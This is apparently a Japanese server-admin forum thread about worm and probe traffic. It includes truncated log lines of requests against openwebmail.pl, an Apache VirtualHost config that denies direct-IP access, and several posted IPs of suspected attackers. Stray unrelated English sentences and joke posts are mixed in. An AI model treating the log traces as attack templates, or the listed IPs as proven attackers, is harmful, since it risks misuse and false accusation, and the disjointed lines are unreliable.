jedle.ms.mff.cuni.cz - - [31/Jul/2004:01:10:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略)
dns.520net.to - - [31/Jul/2004:15:58:28 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略)

こんなんもいっぱい来る…って、ワームじゃなくて故意か(^^;

>>311
それつい先日うちにも来た

Virtual Host の設定例ですよん。

NameVirtualHost *

## default (unknown) domain
<VirtualHost *>
ServerName localhost
DocumentRoot /web/unknown
ErrorLog "|bin\rotatelogs.exe logs/unknown/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/unknown/access_%Y%m%d.log 86400 540" common

HostnameLookups On

<Directory "/web/unknown">
Options None
AllowOverride None
Order deny,allow
Deny from all
</Directory>
</VirtualHost>

## abcdefg.com
<VirtualHost *>
ServerName abcdefg.com
DocumentRoot /web/abcdefg.com
ErrorLog "|bin\rotatelogs.exe logs/abcdefg.com/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/abcdefg.com/access_%Y%m%d.log 86400 540" common
<Directory "/web/abcdefg.com">
Options ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>

## vwxyx.info
<VirtualHost *>
ServerName vwxyx.info
DocumentRoot /web/vwxyx.info
ErrorLog "|bin\rotatelogs.exe logs/vwxyx.info/error_%Y%m%d.log 86400 540"
CustomLog "|bin\rotatelogs.exe logs/vwxyx.info/access_%Y%m%d.log 86400 540" common
<Directory "/web/vwxyx.info">
Options ExecCGI
AllowOverride All
Order allow,deny
Allow from all
</Directory>
</VirtualHost>

一個目の設定は二個目三個目の設定に合致しなかったときに評価されるので自然と IP 直打ちによるアクセスと判断可能。
そして、IP 直打ちは access deny に設定する。
web/unknown 自体も作成しない。

あとね、ログを取らないってのはやめたほうがいいと思う。
ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。

/web/unknownをdenyにすると、ワームのアクセスがあるたびに
エラーログに client denied by server configuration: /web/unknown が残ってウザくないか？

それがなぜかですね、
request failed: URI too long
としか書かれてない。

>>313
> あとね、ログを取らないってのはやめたほうがいいと思う。
> ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。
言ってる事はもっともだ
でも、最近普通のlogすらチェックしてる時間無くて…

とりあえず、ありもしないページを要求してきたら、そのIP近辺はまとめてアクセス規制かけるようにしてる。

っつーかこのスレ来るような奴は基本的に分かってない。

>>318
ごめんなさい

OCNってろくに対応しないんでしたっけ？

219.157.121.142
こんなのが・・・・・

219.154.151.29
219.154.8.152
219.154.151.29
YahooBB219037248174.bbtec.net

記念かきこんぶ
221.137.138.141
221.14.244.126

age

かなり古いすれだ、あ

ワームにやられてるかどうかもわかりませんが何か？

ワームにやられたー！
わーーーむ！

ほ

>>324
その通り。
努力が足りない非正規雇用の増加や、
正社員の中にもサービス残業が嫌だなどという甘えた輩が増えていることは
その証拠でしょうね。

The genre began to expand near the turn of century with the development of dime novels and pulp magazines. ,

These are the people he feels at ease with, whose working methods he respects. ,

鯖だけにアニサキスか

　　∧＿∧
　 （　・∀・）　　　　　　　　　　　　人　ｶﾞｯ
　 （　　　　つ―-‐-‐-‐-‐-‐○ < 　>__Λ∩
　 人　Y ノ.　　　　　　　　　　　 　Ｖ｀Д´）/
　 し（＿）　　　　　　　　　　　　　　　 　　/ 　←>>114

ワーム

1だが、このスレまだ残ってるんだな。
保守がてらあげておこう。

だめだって(~_~;)そとはだめ(｡-_-｡)はいきゅうみすですよこれはf^_^;)